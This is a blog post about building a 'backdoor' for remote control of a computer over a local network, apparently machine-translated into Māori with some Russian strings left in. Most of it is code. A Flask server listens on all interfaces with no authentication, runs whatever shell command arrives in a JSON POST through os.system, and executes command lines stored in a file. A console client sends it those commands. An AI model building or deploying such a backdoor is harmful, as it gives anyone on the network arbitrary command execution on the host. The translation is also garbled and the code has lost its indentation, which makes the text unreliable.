Hei Habr!
I titiro tata ahau ki tetahi putanga tangohanga o te awa hootaka "Me pehea te hanga i to ake tono paetukutuku ki roto i te Flask." Na ka whakatau ahau ki te whakakotahi i aku mohiotanga ki etahi kaupapa. Mo te wa roa kaore au i mohio ki te tuhi ka tae mai te whakaaro ki ahau: "He aha e kore ai e hanga he kuaha-muri ki roto i te Flask?"
Ko nga whiringa tuatahi mo nga whakatinanatanga me nga kaha o te backdoor i puta tonu i roto i toku mahunga. Engari i whakatau ahau ki te hanga i tetahi rarangi o nga kaha o muri:
- Me mohio ki te whakatuwhera i nga paetukutuku
- Me uru ki te raina whakahau
- Ka taea e koe te whakatuwhera i nga kaupapa, whakaahua, ataata
Na, ko te tohu tuatahi he tino ngawari ki te whakatinana ma te whakamahi i te waahanga tirotiro tukutuku. I whakatau ahau ki te whakatinana i te waahanga tuarua ma te whakamahi i te waahanga os. A ko te tuatoru kei roto ano i te waahanga os, engari ka whakamahi ahau i nga "hononga" (he maha atu mo tera i muri mai).
Te tuhi i te tūmau
Na, *drumroll* nga waehere tūmau katoa:
from flask import Flask, request
import webbrowser
import os
import re
app = Flask(__name__)
@app.route('/mycomp', methods=['POST'])
def hell():
json_string = request.json
if json_string['command'] == 'test':
return 'The server is running and waiting for commands...'
if json_string['command'] == 'openweb':
webbrowser.open(url='https://www.'+json_string['data'], new=0)
return 'Site opening ' + json_string['data'] + '...'
if json_string['command'] == 'shell':
os.system(json_string['data'])
return 'Command execution ' + json_string['data'] + '...'
if json_string['command'] == 'link':
links = open('links.txt', 'r')
for i in range(int(json_string['data'])):
link = links.readline()
os.system(link.split('>')[0])
return 'Launch ' + link.split('>')[1]
if __name__ == '__main__':
app.run(host='0.0.0.0')
Kua tukuna e ahau nga waehere katoa, kua tae ki te wa ki te whakamarama i te ngako.
Ka haere nga waehere katoa ki te rorohiko o te rohe i runga i te tauranga 5000. Hei taunekeneke ki te tūmau, me tuku he tono JSON POST.
Hanganga tono JSON:
{‘command’: ‘comecommand’, ‘data’: ‘somedata’}Ae, he mea tika ko te 'whakahau' te whakahau e hiahia ana matou ki te whakahaere. A ko 'raraunga' nga tohenga whakahau.
Ka taea e koe te tuhi me te tuku tono a JSON ki te taunekeneke me te tūmau ma te ringa (ma nga tono ka awhina koe). Ka taea ranei e koe te tuhi i tetahi kaihoko papatohu.
Te tuhi i te kiritaki
Waehere:
import requests
logo = ['nn',
'****** ********',
'******* *********',
'** ** ** **',
'** ** ** ** Written on Python',
'******* ** **',
'******** ** **',
'** ** ** ** Author: ROBOTD4',
'** ** ** **',
'** ** ** **',
'******** *********',
'******* ********',
'nn']
p = ''
iport = '192.168.1.2:5000'
host = 'http://' + iport + '/mycomp'
def test():
dict = {'command': 'test', 'data': 0}
r = requests.post(host, json=dict)
if r.status_code == 200:
print (r.content.decode('utf-8'))
def start():
for i in logo:
print(i)
start()
test()
while True:
command = input('>')
if command == '':
continue
a = command.split()
if command == 'test':
dict = {'command': 'test', 'data': 0}
r = requests.post(host, json=dict)
if r.status_code == 200:
print (r.content.decode('utf-8'))
if a[0] == 'shell':
for i in range(1, len(a)):
p = p + a[i] + ' '
dict = {'command': 'shell', 'data': p}
r = requests.post(host, json=dict)
if r.status_code == 200:
print (r.content.decode('utf-8'))
p = ''
if a[0] == 'link':
if len(a) > 1:
dict = {'command': 'link', 'data': int(a[1])}
r = requests.post(host, json=dict)
if r.status_code == 200:
print (r.content.decode('utf-8'))
else:
print('Комманда не содержит аргументов!')
if a[0] == 'openweb':
if len(a) > 1:
dict = {'command': 'openweb', 'data': a[1]}
r = requests.post(host, json=dict)
if r.status_code == 200:
print (r.content.decode('utf-8'))
else:
print('Комманда не содержит аргументов!')
if a[0] == 'set':
if a[1] == 'host':
ip = a[2] + ':5000'
if command == 'quit':
break
Whakamaramatanga:
Tuatahi, ka kawemai nga waahanga tono (mo te taunekeneke me te tūmau). Kei raro nei nga korero mo te tiimata me nga mahi whakamatautau. Na ko te huringa e tupu ai te makutu. Kua panui koe i te waehere? Na ka mohio koe ki te tikanga o te makutu ka puta i roto i te huringa. Whakauruhia te whakahau - ka mahia. Anga – he whakahau mo te raina whakahau (kei te tauine te arorau).
Whakamatau – tirohia mena kei te rere te tūmau (kuhatua)
Hononga – te whakamahi i te “pokatata”
Openweb – te whakatuwhera i te paetukutuku
Kati – puta atu i te kiritaki
Tautuhi – te whakatakoto i te ip o to rorohiko ki te whatunga rohe
Na inaianei mo te hono.
He konae hono.txt kei te taha o te tūmau. Kei roto nga hononga (ara katoa) ki nga konae (ataata, whakaahua, kaupapa).
He penei te hanganga:
полный_путь>описание
полный_путь>описание
Ko te hua
Kei a matou he tūmau o muri mo te whakahaere rorohiko i runga i te whatunga rohe (i roto i te whatunga wi-fi). Ma te hangarau, ka taea e taatau te whakahaere i te kaihoko mai i tetahi taputapu he kaiwhakamaori python.
PS I tapiritia e ahau te whakahau kua whakaritea mehemea ka tohua he rorohiko i runga i te whatunga rohe he IP rereke, ka taea te whakarereke tika i roto i te kiritaki.
Source: will.com